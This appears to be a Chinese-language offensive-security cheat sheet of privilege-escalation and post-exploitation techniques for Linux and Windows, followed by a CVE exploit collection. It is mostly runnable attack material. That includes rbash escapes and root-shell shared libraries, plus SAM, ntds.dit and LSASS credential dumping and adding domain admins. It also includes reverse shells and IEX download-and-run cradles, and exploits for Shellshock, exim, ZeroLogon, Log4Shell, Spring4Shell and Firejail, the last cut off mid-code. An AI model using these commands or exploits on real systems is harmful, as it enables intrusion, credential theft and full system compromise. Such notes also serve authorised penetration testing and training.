/usr/bin/php7.2 -r "pcntl_exec('/bin/bash', ['-p']);"

rbash

使用 $PATH 变量进行突破
1
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
使用less进行突破
1
2
less /etc/profile
!/bin/sh
1
2
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v
1
2
less /etc/profile
v:shell
使用 scp 进行突破
1
2
3
4
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
scp -S $TF x y:
使用 vi 进行突破
1
vi -c ':!/bin/sh' /dev/null
1
2
3
vi
:set shell=/bin/sh
:shell
使用 SSH 命令执行进行突破
1
2
3
ssh <USERNAME>@<RHOST> -t sh
ssh <USERNAME>@<RHOST> -t /bin/sh
ssh <USERNAME>@<RHOST> -t "/bin/bash --no-profile"
中继

二进制文件需要设置该位SUID

1
/usr/sbin/relayd -C /etc/shadow
共享库配置错误

https://tbhaxor.com/exploiting-shared-library-misconfigurations/

shell.c
1
2
3
4
5
6
7
8
#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
}
编译
1
gcc -shared -fPIC -nostartfiles -o <FILE>.so <FILE>.c
通配符

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

使用该命令touch -- --checkpoint=1将创建一个文件。为什么?因为--命令后面touch是告诉touch,有等待的选项。它不创建一个选项,而是创建一个名为--checkpoint=1.

1
touch -- --checkpoint=1

或者

1
touch ./--checkpoint=1

因此,在创建--checkpoint=1文件后,我创建了另一个文件,该文件执行 shell 脚本。

1
touch -- '--checkpoint-action=exec=sh shell.sh'

或者

1
touch ./--checkpoint-action=exec=<FILE>

要删除配置错误的文件,请./在其前面添加 。

1
rm ./'--checkpoint-action=exec=python script.sh'
Linux 中的可写目录
1
2
/dev/shm
/tmp

微软Windows

基本 Windows 枚举
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
systeminfo
whoami /all
net user
net user /domain
net user <USERNAME>
tree /f C:\Users\
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *cred* == *vnc* == *.config*
accesschk.exe -uws "Everyone" "C:\Program Files\"
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
AppLocker 绕过列表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
访问检查
检查文件权限
1
.\accesschk.exe /accepteula -quvw "C:\PATH\TO\FILE\<FILE>.exe"
检查服务权限
1
.\accesschk.exe /accepteula -uwcqv <USERNAME> daclsvc
检查路径权限以查找未加引号的服务路径
1
2
3
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\<UNQUOTED_SERVICE_PATH>"
检查注册表项
1
.\accesschk.exe /accepteula -uvwqk <REGISTRY_KEY>
将用户添加到组
1
2
3
net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>
net localgroup "Remote Management Users" /add <USERNAME>
启用远程桌面 (RDP)
1
2
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

或者

1
2
3
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0;
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1;
Enable-NetFirewallRule -DisplayGroup "Remote Desktop";
特权和权限
始终安装提升
1
2
3
4
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> -f msi > <FILE>.msi
1
msiexec /quiet /qn /i <FILE>.msi
SeBackup 和 SeRestore 权限
备份 SAM 和 SYSTEM 哈希值
1
2
reg save hklm\system C:\Users\<USERNAME>\system.hive
reg save hklm\sam C:\Users\<USERNAME>\sam.hive
转储哈希值
1
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
SeBackupPrivilege 权限升级 (diskshadow)

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

PowerShell环境脚本
1
2
3
4
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias foobarp
createp
expose %foobar% z:p
1
diskshadow /s <FILE>.txt
复制 ntds.dit
1
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
导出系统注册表值
1
reg save HKLM\SYSTEM c:\temp\system
提取哈希值
1
impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL
通过 Robocopy 的替代方式
1
2
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
1
2
3
4
5
6
7
8
set metadata C:\Windows\temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
1
2
diskshadow /s script.txt
robocopy /b E:\Windows\ntds . ntds.dit
1
impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL
SeLoadDriverPrivilegy
1
2
sc.exe query
$services=(get-service).name | foreach {(Get-ServiceAcl $_)  | where {$_.access.IdentityReference -match 'Server Operators'}}
1
2
3
sc.exe config VSS binpath="C:\temp\nc64.exe -e cmd <LHOST> <LPORT>"
sc.exe stop VSS
sc.exe start VSS
SeTake所有权特权
1
takeown /f C:\Windows\System32\Utilman.exe
1
icacls C:\Windows\System32\Utilman.exe /grant Everyone:F
1
C:\Windows\System32\> copy cmd.exe utilman.exe

单击Ease of Access登录屏幕上的按钮即可获取具有权限的 shell NT Authority\System

SeImpersonate 和 SeAssignPrimaryToken 权限

https://github.com/antonioCoco/RogueWinRM

1
.\RogueWinRM.exe -p "C:\> .\nc64.exe" -a "-e cmd.exe <LHOST> <LPORT>"
注册表处理
启用彩色输出
1
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

然后打开一个新的终端窗口。

检查自动运行程序
1
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
获取注册表项信息
1
req query <REGISTRY_KEY>
修改注册表键值
1
reg add <REGISTRY_KEY> /v <VALUE_TO_MODIFY> /t REG_EXPAND_SZ /d C:\PATH\TO\FILE\<FILE>.exe /f
搜索凭证
快速获胜

https://twitter.com/NinjaParanoid/status/1516442028963659777?t=g7ed0vt6ER8nS75qd-g0sQ&s=09

https://www.nirsoft.net/utils/credentials_file_view.html

1
2
3
4
5
cmdkey /list
rundll32 keymgr.dll, KRShowKeyMgr
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
搜索密码
1
2
3
4
5
dir .s *pass* == *.config
findstr /si password *.xml *.ini *.txt
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<USERNAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction
PowerShell历史
1
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
保存的 Windows 凭据
1
2
cmdkey /list
runas /savecred /user:<USERNAME> cmd.exe
Winlogon 凭据
1
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
本地管理员密码解决方案 (LAPS)
1
PS C:\> Get-ADComputer <RHOST> -property 'ms-mcs-admpwd'
在注册表中搜索密码
1
2
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
转储凭证
1
2
3
4
5
reg save hklm\system system
reg save hklm\sam sam
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
查找 KeePass 数据库
1
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
互联网信息服务 (IIS)
1
2
C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
PUTTY
1
reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s
LSASS
1
2
tasklist
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 688 C:\Users\Administrator\Documents\lsass.dmp full
无人值守的 Windows 安装
1
2
3
4
5
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
不安全的服务权限
1
2
3
4
5
accesschk64.exe -qlc <SERVICE>
icacls C:\Users\<USERNAME>\<FILE>.exe /grant Everyone:F
sc config <SERVICE> binPath= "C:\Users\<USERNAME>\<FILE>.exe" obj= LocalSystem
sc stop <SERVICE>
sc start <SERVICE>
服务处理
1
2
3
sc create <SERVICE_NAME>
sc start <SERVICE_NAME>
sc qc <SERVICE_NAME>
计划任务
1
2
3
4
schtasks
schtasks /query /tn <TASK> /fo list /v
schtasks /run /tn <TASK>
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
未加引号的服务路径

Unquoted Service Paths使用 进行搜索sc qc

1
2
3
4
sc qc
sc qc <SERVICE>
sc stop <SERVICE>
sc start <SERVICE>
1
2
3
icacls <PROGRAM>.exe
icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe
icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe /grant Everyone:F
写DACL

https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/

1
2
3
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $SecPassword)
Add-ObjectACL -PrincipalIdentity <USERNAME> -Credential $Cred -Rights DCSync
WMIC
1
2
wmic product get name,version,vendor
wmic qfe get Caption,Description,HotFixID,InstalledOn    # no new patches - KEXP pretty likely

通过证书

https://offsec.almond.consulting/authentication-with-certificates-when-pkinit-is-not-supported.html

https://github.com/AlmondOffSec/PassTheCert/tree/main/Python

1
2
3
4
certipy-ad cert -pfx <CERTIFICATE>.pfx -nokey -out <CERTIFICATE>.crt
certipy-ad cert -pfx <CERTIFICATE>.pfx -nocert -out <CERTIFICATE>.key
python3 passthecert.py -domain '<DOMAIN>' -dc-host '<DOMAIN>' -action 'modify_user' -target '<USERNAME>' -new-pass '<PASSWORD>' -crt ./<CERTIFICATE>.crt -key ./<CERTIFICATE>.key
evil-winrm -i '<RHOST>' -u '<USERNAME>' -p '<PASSWORD>'

PKINIT工具

1
2
3
python3 gettgtpkinit.py -cert-pfx <USERNAME>.pfx -dc-ip <RHOST> <DOMAIN>/<USERNAME> <USERNAME>.ccache
export KRB5CCNAME=<USERNAME>.ccache
python3 getnthash.py <DOMAIN>/<USERNAME> -key 6617cde50b7ee63faeb6790e84981c746efa66f68a1cc3a394bbd27dceaf0554

端口扫描

1
export ip=<RHOST>; for port in $(seq 1 65535); do timeout 0.01 bash -c "</dev/tcp/$ip/$port && echo The port $port is open || echo The Port $port is closed > /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done

powercat

1
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1');powercat -c <LHOST> -p <LPORT> -e cmd"

Powermad

1
2
3
Import-Module ./Powermad.ps1
$secureString = convertto-securestring "<PASSWORD>" -asplaintext -force
New-MachineAccount -MachineAccount <NAME> -Domain <DOMAIN> -DomainController <DOMAIN> -Password $secureString

PowerShell

常用命令
1
2
3
4
5
6
7
8
9
10
11
12
whoami /all
getuserid
systeminfo
Get-Process
net users
net users <USERNAME>
Get-ADUser -Filter * -SearchBase "DC=<DOMAIN>,DC=LOCAL"
Get-Content <FILE>
Get-ChildItem . -Force
GCI -hidden
type <FILE> | findstr /l <STRING>
[convert]::ToBase64String((Get-Content -path "<FILE>" -Encoding byte))
允许脚本执行
1
2
Set-ExecutionPolicy remotesigned
Set-ExecutionPolicy unrestricted
脚本执行绕过
1
powershell.exe -noprofile -executionpolicy bypass -file .\<FILE>.ps1
将模块导入到 PowerShell cmdlet
1
Import-Module .\<FILE>
检查 PowerShell 版本
1
2
3
Set-ExecutionPolicy Unrestricted
powershell -Command "$PSVersionTable.PSVersion"
powershell -c "[Environment]::Is64BitProcess"
阅读 PowerShell 历史
1
type C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
创建 .zip 文件
1
Compress-Archive -LiteralPath C:\PATH\TO\FOLDER\<FOLDER> -DestinationPath C:\PATH\TO\FILE<FILE>.zip
解压文件
1
Expand-Archive -Force <FILE>.zip
开始一个新流程
1
Start-Process -FilePath "C:\nc64.exe" -ArgumentList "<LHOST> <LPORT> -e powershell"
调用表达式 / 调用 WebRequest
1
2
IEX(IWR http://<LHOST>/<FILE>.ps1)
Invoke-Expression (Invoke-WebRequest http://<LHOST/<FILE>.ps1)
.NET 反射
1
2
3
4
$bytes = (Invoke-WebRequest "http://<LHOST>/<FILE>.exe" -UseBasicParsing ).Content
$assembly = [System.Reflection.Assembly]::Load($bytes)
$entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')
$entryPointMethod.Invoke($null, (, [string[]] ('find', '/<COMMAND>')))
启动offsec会话
1
2
$offsec_session = New-PSSession -ComputerName <RHOST> -Authentication Negotiate -Credential <USERNAME>
Enter-PSSession $offsec_session
以另一个用户身份执行命令
1
2
3
4
$SecurePassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $SecurePassword)
$Session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { whoami }

或者

1
2
3
4
5
$username = '<USERNAME>'
$password = '<PASSWORD>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process powershell.exe -Credential $credential
1
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
添加新的域管理员
1
2
3
$PASSWORD= ConvertTo-SecureString –AsPlainText -Force -String <PASSWORD>
New-ADUser -Name "<USERNAME>" -Description "<DESCRIPTION>" -Enabled $true -AccountPassword $PASSWORD
Add-ADGroupMember -Identity "Domain Admins" -Member <USERNAME>
在用户上下文中执行命令
1
2
3
$pass = ConvertTo-SecureString "<PASSWORD>" -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USERNAME>", $pass)
Invoke-Command -computername <COMPUTERNAME> -ConfigurationName dc_manage -credential $cred -command {whoami}
使用凭据执行脚本(反向 Shell)
1
2
3
$pass = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass)
Invoke-Command -Computer <RHOST> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<LHOST>/<FILE>.ps1') } -Credential $cred

pwncat

1
2
(local) pwncat$ back    // get back to shell
Ctrl+d                  // get back to pwncat shell
1
2
3
pwncat-cs -lp <LPORT>
(local) pwncat$ download /PATH/TO/FILE/<FILE> .
(local) pwncat$ upload /PATH/TO/FILE/<FILE> /PATH/TO/FILE/<FILE>

RPCLIENT

1
rpcclient -U "" <RHOST>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
dsr_getdcname
dsr_getdcnameex
dsr_getdcnameex2
dsr_getsitename
enumdata
enumdomgroups
enumdomusers
enumjobs
enumports
enumprivs
getanydcname
getdcname
lookupsids
lsaenumsid <SID>
lsaquery
netconnenum
netdiskenum
netfileenum
netsessenum
netshareenum
netshareenumall
netsharegetinfo
queryuser <USERNAME>
srvinfo

Rubeus.exe

获取服务主体哈希值
1
.\Rubeus.exe kerberoast /user:<USERNAME>
哈希传递
1
.\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials

RunasCs.exe

1
2
3
4
.\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT>
.\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT> --bypass-uac
.\RunasCs.exe -d <DOMAIN> "<USERNAME>" '<PASSWORD>' cmd.exe -r <LHOST>:<LPORT>
.\RunasCs.exe -l 3 -d <DOMAIN> "<USERNAME>" '<PASSWORD>' 'C:\Users\<USERNAME>\Downloads\<FILE>.exe'

smbpasswd

1
smbpasswd -U <RHOST>\<USERNAME> -r <RHOST>

winexe

1
2
winexe -U '<USERNAME%PASSWORD>' //<RHOST> cmd.exe
winexe -U '<USERNAME%PASSWORD>' --system //<RHOST> cmd.exe

CVE 漏洞集合汇总

CVE-2014-6271:Shellshock RCE PoC

1
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' http://<RHOST>/cgi-bin/user.sh

CVE-2016-1531:exim LPE

  • exim 版本 <= 4.84-3
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    #!/bin/sh
    # CVE-2016-1531 exim <= 4.84-3 local root exploit
    # ===============================================
    # you can write files as root or force a perl module to
    # load by manipulating the perl environment and running
    # exim with the "perl_startup" arguement -ps. 
    #
    # e.g.
    # [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
    # [ CVE-2016-1531 local root exploit
    # sh-4.3# id
    # uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
    # 
    # -- Hacker Fantastic 
    echo [ CVE-2016-1531 local root exploit
    cat > /tmp/root.pm << EOF
    package root;
    use strict;
    use warnings;

    system("/bin/sh");
    EOF
    PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

CVE-2019-14287:Sudo 绕过

https://www.exploit-db.com/exploits/47502

先决条件
  • 须藤版本 < 1.8.28
开发
1
2
!root:
sudo -u#-1 /bin/bash

CVE-2020-1472:ZeroLogon PE

https://github.com/SecuraBV/CVE-2020-1472

https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py

先决条件
1
2
3
4
python3 -m pip install virtualenv
python3 -m virtualenv venv
source venv/bin/activate
pip install git+https://github.com/SecureAuthCorp/impacket
概念验证修改
1
2
3
4
5
6
7
8
9
10
11
newPassRequest = nrpc.NetrServerPasswordSet2()
newPassRequest['PrimaryName'] = dc_handle + '\x00'
newPassRequest['AccountName'] = target_computer + '$\x00'
newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
auth = nrpc.NETLOGON_AUTHENTICATOR()
auth['Credential'] = b'\x00' * 8
auth['Timestamp'] = 0
newPassRequest['Authenticator'] = auth
newPassRequest['ComputerName'] = target_computer + '\x00'
newPassRequest['ClearNewPassword'] =  b'\x00' * 516
rpc_con.request(newPassRequest)
武器化概念验证
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/env python3

from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto

import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call

# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%

def fail(msg):
  print(msg, file=sys.stderr)
  print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
  sys.exit(2)

def try_zero_authenticate(dc_handle, dc_ip, target_computer):
  # Connect to the DC's Netlogon service.
  binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
  rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
  rpc_con.connect()
  rpc_con.bind(nrpc.MSRPC_UUID_NRPC)

  # Use an all-zero challenge and credential.
  plaintext = b'\x00' * 8
  ciphertext = b'\x00' * 8

  # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. 
  flags = 0x212fffff

  # Send challenge and authentication request.
  nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
  try:
    server_auth = nrpc.hNetrServerAuthenticate3(
      rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
      target_computer + '\x00', ciphertext, flags
    )

    
    # It worked!
    assert server_auth['ErrorCode'] == 0
    newPassRequest = nrpc.NetrServerPasswordSet2()
    newPassRequest['PrimaryName'] = dc_handle + '\x00'
    newPassRequest['AccountName'] = target_computer + '$\x00'
    newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
    auth = nrpc.NETLOGON_AUTHENTICATOR()
    auth['Credential'] = b'\x00' * 8
    auth['Timestamp'] = 0
    newPassRequest['Authenticator'] = auth
    newPassRequest['ComputerName'] = target_computer + '\x00'
    newPassRequest['ClearNewPassword'] =  b'\x00' * 516
    rpc_con.request(newPassRequest)
    return rpc_con

  except nrpc.DCERPCSessionError as ex:
    # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
    if ex.get_error_code() == 0xc0000022:
      return None
    else:
      fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
  except BaseException as ex:
    fail(f'Unexpected error: {ex}.')


def perform_attack(dc_handle, dc_ip, target_computer):
  # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
  print('Performing authentication attempts...')
  rpc_con = None
  for attempt in range(0, MAX_ATTEMPTS):  
    rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
    
    if not rpc_con:
      print('=', end='', flush=True)
    else:
      break

  if rpc_con:
    print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
  else:
    print('\nAttack failed. Target is probably patched.')
    sys.exit(1)


if __name__ == '__main__':
  if not (3 <= len(sys.argv) <= 4):
    print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
    print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
    print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
    sys.exit(1)
  else:
    [_, dc_name, dc_ip] = sys.argv

    dc_name = dc_name.rstrip('$')
    perform_attack('\\\\' + dc_name, dc_ip, dc_name)
执行
1
2
python3 zerologon_tester.py <HANDLE> <RHOST>
impacket-secretsdump -just-dc -no-pass <HANDLE>\$@<RHOST>

CVE-2021-3156:Sudo / sudoedit LPE

https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435

先决条件
  • Ubuntu 20.04(sudo 1.8.31)
  • Debian 10 (sudo 1.8.27)
  • Fedora 33(sudo 1.9.2)
  • 所有旧版本 >= 1.8.2 到 1.8.31p2 以及所有稳定版本 >= 1.9.0 到 1.9.5p1
漏洞测试
1
sudoedit -s /

如果显示以下消息之一,则机器容易受到攻击。

1
2
sudoedit: /: not a regular file
segfault

如果错误消息以 开头,则不容易受到攻击usage:

CVE-2021-44228:Log4Shell RCE(0 天)

https://github.com/welk1n/JNDI-Injection-Exploit

1
wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<COMMAND>"
1
${jndi:ldap://<LHOST>:1389/ci1dfd}
或者

https://github.com/kozmer/log4j-shell-poc

先决条件

https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

1
tar -xvf jdk-8u20-linux-x64.tar.gz
启动监听器
1
python poc.py --userip <LHOST> --webport <RPORT> --lport <LPORT>
执行
1
${jndi:ldap://<LHOST>:1389/foobar}

CVE-2022-0847:脏管道 LPE

1
2
3
gcc -o dirtypipe dirtypipe.c
./dirtypipe /etc/passwd 1 ootz:
su rootz

CVE-2022-22963:Spring4Shell RCE(0 天)

https://github.com/me2nuk/CVE-2022-22963

1
curl -X POST http://<RHOST>/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <LHOST>/<FILE>.sh -o /dev/shm/<FILE>")' --data-raw 'data' -v
1
curl -X POST http://<RHOST>/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /dev/shm/<FILE>")' --data-raw 'data' -v

CVE-2022-31214:Firejail LPE

https://seclists.org/oss-sec/2022/q2/188

https://www.openwall.com/lists/oss-security/2022/06/08/10

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
#!/usr/bin/python3

# Author: Matthias Gerstner <matthias.gerstner () suse com>
#
# Proof of concept local root exploit for a vulnerability in Firejail 0.9.68
# in joining Firejail instances.
#
# Prerequisites:
# - the firejail setuid-root binary needs to be installed and accessible to the
#   invoking user
#
# Exploit: The exploit tricks the Firejail setuid-root program to join a fake
# Firejail instance. By using tmpfs mounts and symlinks in the unprivileged
# user namespace of the fake Firejail instance the result will be a shell that
# lives in an attacker controller mount namespace while the user namespace is
# still the initial user namespace and the nonewprivs setting is unset,
# allowing to escalate privileges via su or sudo.

import os
import shutil
import stat
import subprocess
import sys
import tempfile
import time
from pathlib import Path

# Print error message and exit with status 1
def printe(*args, **kwargs):
    kwargs['file'] = sys.stderr
    print(*args, **kwargs)
    sys.exit(1)

# Return a boolean whether the given file path fulfils the requirements for the
# exploit to succeed:
# - owned by uid 0
# - size of 1 byte
# - the content is a single '1' ASCII character
def checkFile(f):
    s = os.stat(f)

    if s.st_uid != 0 or s.st_size != 1 or not stat.S_ISREG(s.st_mode):
        return False

    with open(f) as fd:
        ch = fd.read(2)

        if len(ch) != 1 or ch != "1":
            return False

    return True

def mountTmpFS(loc):
    subprocess.check_call("mount -t tmpfs none".split() + [loc])

def bindMount(src, dst):
    subprocess.check_call("mount --bind".split() + [src, dst])

def checkSelfExecutable():
    s = os.stat(__file__)

    if (s.st_mode & stat.S_IXUSR) == 0:
        printe(f"{__file__} needs to have the execute bit set for the exploit to work. Run `chmod +x {__file__}` and try again.")

# This creates a "helper" sandbox that serves the purpose of making available
# a proper "join" file for symlinking to as part of the exploit later on.
#
# Returns a tuple of (proc, join_file), where proc is the running subprocess
# (it needs to continue running until the exploit happened) and join_file is
# the path to the join file to use for the exploit.
def createHelperSandbox():
    # just run a long sleep command in an unsecured sandbox
    proc = subprocess.Popen(
            "firejail --noprofile -- sleep 10d".split(),
            stderr=subprocess.PIPE)

    # read out the child PID from the stderr output of firejail
    while True:
        line = proc.stderr.readline()
        if not line:
            raise Exception("helper sandbox creation failed")

        # on stderr a line of the form "Parent pid <ppid>, child pid <pid>" is output
